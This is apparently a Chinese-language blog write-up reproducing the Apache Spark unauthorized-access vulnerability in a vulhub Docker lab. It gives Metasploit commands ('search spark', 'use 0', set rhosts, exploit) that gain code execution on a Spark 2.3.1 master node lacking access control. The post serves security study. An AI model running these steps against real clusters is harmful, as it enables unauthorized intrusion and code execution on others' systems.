Spark未授权访问

介绍

apache顶级项目,大规模数据处理计算引擎。为了方便的给使用者控制系统进行计算和查看任务结果,提供了WebUI图形化界面和相应的REST API方便用户操作。支持用户向管理节点提交应用,并分发给集群使用,如果管理节点未启用ACL(访问控制),我们便可在集群中执行任意代码。

环境搭建

进入vulhub-master/spark/unacc

使用

1
docker-compose up -d

image-20240126000543877

image-20240126000721812

发现版本是2.3.1

漏洞复现

端口扫描

image-20240201174429203

发现可能存在漏洞

利用

使用msf

1
2
3
4
search spark
use 0
set rhosts 192.168.79.128
exploit

image-20240201175140752

成功拿下

#漏洞复现
Spark未授权访问
https://tsy244.github.io/2024/01/25/漏洞复现/Spark未授权访问/
Author
August Rosenberg
Posted on
January 25, 2024
Licensed under